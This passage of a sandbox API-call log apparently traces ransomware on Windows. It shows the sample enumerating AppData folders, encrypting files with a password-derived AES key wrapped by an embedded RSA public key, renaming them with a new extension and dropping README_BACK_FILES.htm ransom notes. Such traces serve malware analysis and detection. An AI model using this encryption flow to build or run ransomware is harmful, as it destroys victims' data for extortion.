lpWideCharStr=0x0) returned 63 [0242.405] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\CEF\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\cef\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d10 [0242.406] GetFileType (hFile=0x5d10) returned 0x1 [0242.406] WriteFile (in: hFile=0x5d10, lpBuffer=0x2b9d7f8*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d7f0, lpOverlapped=0x0 | out: lpBuffer=0x2b9d7f8*, lpNumberOfBytesWritten=0x2b9d7f0*=0x5ec, lpOverlapped=0x0) returned 1 [0242.407] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0242.407] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e88b8 [0242.409] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0242.409] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0242.409] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e7978 [0242.410] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.410] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.410] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0242.410] GetLastError () returned 0x0 [0242.410] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\temp\\calendarcache.dat")) returned 0x20 [0242.410] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat", dwFileAttributes=0x80) returned 1 [0242.411] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\temp\\calendarcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0242.411] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\temp\\calendarcache.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0242.411] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat.gsg", dwFileAttributes=0x2) returned 1 [0242.412] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6348) returned 1 [0242.414] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0242.414] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0242.414] CryptHashData (hHash=0x28e8078, pbData=0x2857218, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0242.414] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8078, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bee18) returned 1 [0242.414] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0242.414] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0242.414] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f5138) returned 1 [0242.415] CryptImportPublicKeyInfo (in: hCryptProv=0x28f5138, dwCertEncodingType=0x1, pInfo=0x29362e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2936310*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2936318*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bf018) returned 1 [0242.415] CryptEncrypt (in: hKey=0x28bf018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0242.415] CryptEncrypt (in: hKey=0x28bf018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5688*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f5688*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0242.415] WriteFile (in: hFile=0x5d3c, lpBuffer=0x28f5688*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28f5688*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0242.416] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x14, lpOverlapped=0x0) returned 1 [0242.417] CryptEncrypt (in: hKey=0x28bee18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x14, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x20) returned 1 [0242.417] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x20, lpOverlapped=0x0) returned 1 [0242.417] CloseHandle (hObject=0x5d44) returned 1 [0242.418] CloseHandle (hObject=0x5d3c) returned 1 [0242.419] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\temp\\calendarcache.dat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\temp\\calendarcache.dat"), bFailIfExists=0) returned 1 [0242.422] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat", dwFileAttributes=0x0) returned 1 [0242.422] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\temp\\calendarcache.dat.gsg")) returned 1 [0242.424] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\temp\\calendarcache.dat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\temp\\calendarcache.dat.fuck")) returned 1 [0242.425] CryptDestroyHash (hHash=0x28e8078) returned 1 [0242.425] CryptDestroyKey (hKey=0x28bee18) returned 1 [0242.425] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0242.425] FindNextFileA (in: hFindFile=0x28e7978, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0242.425] FindClose (in: hFindFile=0x28e7978 | out: hFindFile=0x28e7978) returned 1 [0242.425] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\temp\\readme_back_files.htm")) returned 0xffffffff [0242.425] AreFileApisANSI () returned 1 [0242.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0242.425] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Temp\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\temp\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0242.426] GetFileType (hFile=0x5d14) returned 0x1 [0242.426] WriteFile (in: hFile=0x5d14, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0242.427] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0242.427] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Unistore\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bee18 [0242.427] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.427] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0242.427] FindClose (in: hFindFile=0x28bee18 | out: hFindFile=0x28bee18) returned 1 [0242.428] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Unistore\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistore\\readme_back_files.htm")) returned 0xffffffff [0242.428] AreFileApisANSI () returned 1 [0242.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6f80, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0242.428] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\Unistore\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistore\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0242.429] GetFileType (hFile=0x5d14) returned 0x1 [0242.429] WriteFile (in: hFile=0x5d14, lpBuffer=0x2b9d45c*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d454, lpOverlapped=0x0 | out: lpBuffer=0x2b9d45c*, lpNumberOfBytesWritten=0x2b9d454*=0x5ec, lpOverlapped=0x0) returned 1 [0242.430] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0242.430] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bf1d8 [0242.443] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.443] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0242.443] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0242.443] GetLastError () returned 0x0 [0242.443] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\store.vol")) returned 0x220 [0242.444] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol", dwFileAttributes=0x80) returned 1 [0242.444] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\store.vol"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0242.444] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\comms\\unistoredb\\store.vol.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0242.445] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Comms\\UnistoreDB\\store.vol.gsg", dwFileAttributes=0x2) returned 1 [0242.445] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f6348) returned 1 [0242.447] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0242.447] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0242.447] CryptHashData (hHash=0x28e8078, pbData=0x2856f98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0242.447] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e8078, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7df8) returned 1 [0242.447] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0242.447] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0242.447] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f50b0) returned 1 [0242.448] CryptImportPublicKeyInfo (in: hCryptProv=0x28f50b0, dwCertEncodingType=0x1, pInfo=0x29366f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2936720*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2936728*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x282e3b8) returned 1 [0242.448] CryptEncrypt (in: hKey=0x282e3b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0242.448] CryptEncrypt (in: hKey=0x282e3b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f5d70*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f5d70*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0242.448] WriteFile (in: hFile=0x5d44, lpBuffer=0x28f5d70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x28f5d70*, lpNumberOfBytesWritten=0x2b9d5a0*=0x80, lpOverlapped=0x0) returned 1 [0242.449] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.456] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.456] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.485] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.486] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.486] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.487] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.487] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.487] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.487] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.487] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.487] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.487] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.487] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.487] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.488] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.488] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.488] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.488] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.488] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.488] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.488] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.488] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.488] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.489] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.489] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.489] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.489] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: 